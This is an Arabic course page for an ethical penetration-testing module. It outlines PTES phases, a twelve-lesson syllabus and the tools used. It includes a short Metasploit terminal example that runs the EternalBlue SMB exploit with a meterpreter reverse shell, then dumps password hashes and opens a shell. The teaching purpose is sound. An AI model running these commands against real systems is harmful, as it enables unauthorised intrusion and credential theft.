اختبار الاختراق (Penetration Testing)

منهجية الاختراق الأخلاقي — من جمع المعلومات حتى كتابة التقرير النهائي.

المرحلة 06 6 أسابيع متقدم
12
درس
5
أدوات رئيسية
25+
مهارة مكتسبة

📖 نظرة عامة

مراحل Penetration Testing

اختبار الاختراق المنهجي يتبع 5 مراحل: Reconnaissance → Scanning → Exploitation → Post Exploitation → Reporting. ستتعلم كل مرحلة بالتفصيل العملي.

🔍

Reconnaissance

جمع المعلومات — OSINT, DNS enumeration, Google Dorking.

💥

Exploitation

استخدام Metasploit وexploits مخصصة لاختراق الأنظمة.

⬆️

Privilege Escalation

رفع الصلاحيات من مستخدم عادي إلى root/Administrator.

📝

Report Writing

كتابة تقرير احترافي يشرح الثغرات وطريقة الإصلاح.

📋 المحاور التفصيلية

#المحورالمدة
01منهجية PTES — معيار اختبار الاختراق2 أيام
02Reconnaissance — OSINT وGoogle Dorking3 أيام
03Enumeration — Nmap المتقدم وNikto3 أيام
04Metasploit Framework — الأساسيات4 أيام
05Exploitation — استغلال الثغرات المعروفة4 أيام
06Linux Privilege Escalation3 أيام
07Windows Privilege Escalation3 أيام
08Password Cracking — John, Hashcat3 أيام
09Post Exploitation — pivoting وlateral movement3 أيام
10Writing Exploits — Buffer Overflow basics4 أيام
11كتابة تقرير اختبار الاختراق2 أيام
12مشروع: اختراق آلة HackTheBox4 أيام

💻 Metasploit

Terminal — Metasploit
# تشغيل Metasploit msfconsole # البحث عن exploit search type:exploit platform:windows smb # استخدام exploit use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50 exploit # بعد الاختراق sysinfo getuid hashdump shell

ما يجب إتقانه

🎯 1. منهجية PTES بالكامل
2. OSINT وجمع المعلومات
3. استخدام Metasploit
4. رفع الصلاحيات على Linux وWindows
5. كسر كلمات المرور
6. كتابة تقرير احترافي
المرحلة 5 المرحلة 7: الفريق الأزرق